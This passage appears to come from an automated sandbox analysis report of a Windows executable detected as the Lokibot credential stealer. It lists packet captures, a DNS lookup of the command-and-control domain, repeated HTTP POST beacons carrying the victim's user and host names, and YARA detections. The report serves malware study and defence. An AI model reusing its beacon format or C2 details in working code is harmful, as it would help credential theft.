                              Mar 11, 2025 01:19:34.413742065 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:34.413798094 CET4971080192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:34.418575048 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.167787075 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.168343067 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.168421984 CET4971080192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.175215960 CET4971080192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.180104017 CET8049710104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.741540909 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.747136116 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.747251034 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.803314924 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.808240891 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:35.808325052 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:35.814017057 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.510162115 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.510598898 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.511272907 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.511323929 CET4971180192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.515427113 CET8049711104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.826986074 CET4971280192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.832030058 CET8049712104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.832277060 CET4971280192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.834408045 CET4971280192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.839315891 CET8049712104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:36.839406013 CET4971280192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:36.844176054 CET8049712104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:37.582515001 CET8049712104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:37.583077908 CET8049712104.21.64.1192.168.2.5
                              Mar 11, 2025 01:19:37.583170891 CET4971280192.168.2.5104.21.64.1
                              Mar 11, 2025 01:19:44.549726009 CET4971280192.168.2.5104.21.64.1

                              UDP Packets

                              TimestampSource PortDest PortSource IPDest IP
                              Mar 11, 2025 01:19:32.532927036 CET5876953192.168.2.51.1.1.1
                              Mar 11, 2025 01:19:32.625010967 CET53587691.1.1.1192.168.2.5

                              DNS Queries

                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 11, 2025 01:19:32.532927036 CET192.168.2.51.1.1.10x3091Standard query (0)touxzw.irA (IP address)IN (0x0001)false

                              DNS Answers

                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.64.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.80.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.48.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.112.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.96.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.16.1A (IP address)IN (0x0001)false
                              Mar 11, 2025 01:19:32.625010967 CET1.1.1.1192.168.2.50x3091No error (0)touxzw.ir104.21.32.1A (IP address)IN (0x0001)false

                              HTTP Request Dependency Graph

                              • touxzw.ir

                              HTTP Packets

                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              0192.168.2.549708104.21.64.1808532C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Mar 11, 2025 01:19:32.637934923 CET241OUTPOST /tking3/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 3D34D978
                              Content-Length: 180
                              Connection: close
                              Mar 11, 2025 01:19:32.642770052 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: 'ckav.rualfons472847ALFONS-PCk0FDD42EE188E931437F4FBE2Cazcaj
                              Mar 11, 2025 01:19:33.394264936 CET820INHTTP/1.1 307 Temporary Redirect
                              Date: Tue, 11 Mar 2025 00:19:33 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rlfaFYsX%2FjWbv9O44mW48dYsx3isMFG9Vlid9Mvc8ee9NJOWjpbL3l6Hsvvqupd7w%2FI7tvlC8NbsbZokQomq7LOqOb97P8i6yny1WGTvO6t1YgORe2FOetA13NA%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 91e6e18389b9b637-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2152&min_rtt=2152&rtt_var=1076&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=421&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              1192.168.2.549709104.21.64.1808532C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Mar 11, 2025 01:19:33.559210062 CET241OUTPOST /tking3/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 3D34D978
                              Content-Length: 180
                              Connection: close
                              Mar 11, 2025 01:19:33.564116955 CET180OUTData Raw: 12 00 27 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: 'ckav.rualfons472847ALFONS-PC+0FDD42EE188E931437F4FBE2CQiKQP
                              Mar 11, 2025 01:19:34.334078074 CET998INHTTP/1.1 404 Not Found
                              Date: Tue, 11 Mar 2025 00:19:34 GMT
                              Content-Type: text/html; charset=iso-8859-1
                              Connection: close
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3O5dVyqw2w0Qrj%2FuO2SpTSi2Qh9lSVfozsLga3vizAHbTZAEbowL6UU2yiAPL%2BAF%2BqX0Ge%2F7LX5hOTJK90qe%2FNAxnkrMtN7xOXtPn3iGTHO68kD1B7yo%2FMtCsSs%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 91e6e1893ce68ca1-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=1947&min_rtt=1947&rtt_var=973&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=421&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              2192.168.2.549710104.21.64.1808532C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Mar 11, 2025 01:19:34.408930063 CET241OUTPOST /tking3/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 3D34D978
                              Content-Length: 153
                              Connection: close
                              Mar 11, 2025 01:19:34.413798094 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons472847ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Mar 11, 2025 01:19:35.167787075 CET994INHTTP/1.1 404 Not Found
                              Date: Tue, 11 Mar 2025 00:19:35 GMT
                              Content-Type: text/html; charset=iso-8859-1
                              Connection: close
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L8tYINXp75JzM4a8Zd%2B88WncoXQtLpiRaZEz1kLquyIsT595WlFZhizVvI%2BBut%2BrKCEQBhKoxN4F6mgnP7i5JKkORjRf9ExVPraok9XJKfx6EOOl1WQ%2BooDuVAE%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 91e6e18ea8114e4d-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2078&min_rtt=2078&rtt_var=1039&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=73&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              3192.168.2.549711104.21.64.1808532C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Mar 11, 2025 01:19:35.803314924 CET241OUTPOST /tking3/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 3D34D978
                              Content-Length: 153
                              Connection: close
                              Mar 11, 2025 01:19:35.808325052 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons472847ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Mar 11, 2025 01:19:36.510162115 CET989INHTTP/1.1 404 Not Found
                              Date: Tue, 11 Mar 2025 00:19:36 GMT
                              Content-Type: text/html; charset=iso-8859-1
                              Connection: close
                              cf-cache-status: DYNAMIC
                              vary: accept-encoding
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=65xiB1XIJSfpXkgo0RIgBAqKR2yTYeiEGmNe3hqtpY7ooJkuhIJTBx4i4kKEBEeGujIhOOUsU5ZLtVYLVZInp69Hq9btPuPhYkOZYAsAktXKuk09TQlso2%2FeBJY%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 91e6e196fd967c6a-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2251&min_rtt=2251&rtt_var=1125&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=164&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6b 69 6e 67 33 2f 66 69 76 65 2f 66 72 65 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tking3/five/fre.php was not found on this server.</p></body></html>


                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                              4192.168.2.549712104.21.64.1808532C:\Windows\SysWOW64\svchost.exe
                              TimestampBytes transferredDirectionData
                              Mar 11, 2025 01:19:36.834408045 CET241OUTPOST /tking3/five/fre.php HTTP/1.0
                              User-Agent: Mozilla/4.08 (Charon; Inferno)
                              Host: touxzw.ir
                              Accept: */*
                              Content-Type: application/octet-stream
                              Content-Encoding: binary
                              Content-Key: 3D34D978
                              Content-Length: 153
                              Connection: close
                              Mar 11, 2025 01:19:36.839406013 CET153OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0c 00 00 00 61 00 6c 00 66 00 6f 00 6e 00 73 00 01 00 0c 00 00 00 34 00 37 00 32 00 38 00 34 00 37 00 01 00 12 00 00 00 41 00 4c 00 46 00 4f 00 4e 00 53 00 2d 00 50 00 43 00 00 05 00 00 00
                              Data Ascii: (ckav.rualfons472847ALFONS-PC0FDD42EE188E931437F4FBE2C
                              Mar 11, 2025 01:19:37.582515001 CET819INHTTP/1.1 307 Temporary Redirect
                              Date: Tue, 11 Mar 2025 00:19:37 GMT
                              Connection: close
                              Via: 1.0 middlebox
                              Location: http://88.255.216.16/landpage?op=1&ms=http://touxzw.ir/tking3/five/fre.php
                              cf-cache-status: DYNAMIC
                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=EM5t9q3DieviQn0aA23KjDkBDdXrWQdNEpTIhAxs73iGF1Gf8nhmkGGbgUspjXXpuYAeGZMP5TaLB1COMIKwhsSykJRulPsMpYQfxiTKKQa%2B1Y5iQSi0K0C3OH0%3D"}],"group":"cf-nel","max_age":604800}
                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                              Server: cloudflare
                              CF-RAY: 91e6e19dcbc98ca1-EWR
                              alt-svc: h3=":443"; ma=86400
                              server-timing: cfL4;desc="?proto=TCP&rtt=2027&min_rtt=2027&rtt_var=1013&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=394&delivery_rate=0&cwnd=181&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"


                              Statistics

                              CPU Usage

                              Click to jump to process

                              Memory Usage

                              Click to jump to process

                              High Level Behavior Distribution

                              Click to dive into process behavior distribution

                              Behavior

                              Click to jump to process

                              System Behavior

                              General

                              Target ID:0
                              Start time:20:19:27
                              Start date:10/03/2025
                              Path:C:\Users\user\Desktop\TXzf0xX2uq.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\TXzf0xX2uq.exe"
                              Imagebase:0x7e0000
                              File size:963'584 bytes
                              MD5 hash:D6CBDA717AE7ADDF9B583718998AE15A
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                              • Rule: Loki_1, Description: Loki Payload, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: kevoreilly
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000000.00000002.1305726950.0000000001EC0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                              Reputation:low
                              Has exited:true

                              General

                              Target ID:1
                              Start time:20:19:27
                              Start date:10/03/2025
                              Path:C:\Windows\SysWOW64\svchost.exe
                              Wow64 process (32bit):true
                              Commandline:"C:\Users\user\Desktop\TXzf0xX2uq.exe"
                              Imagebase:0xda0000
                              File size:46'504 bytes
                              MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                              Has elevated privileges:true
                              Has administrator privileges:true
                              Programmed in:C, C++ or other language
                              Yara matches:
                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1371818090.0000000004C00000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                              • Rule: Loki_1, Description: Loki Payload, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: kevoreilly
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000001.00000002.1371339725.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                              • Rule: JoeSecurity_Lokibot_1, Description: Yara detected Lokibot, Source: 00000001.00000002.1371480582.0000000000821000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                              Reputation:high
                              Has exited:true

                              Disassembly

                              Reset < >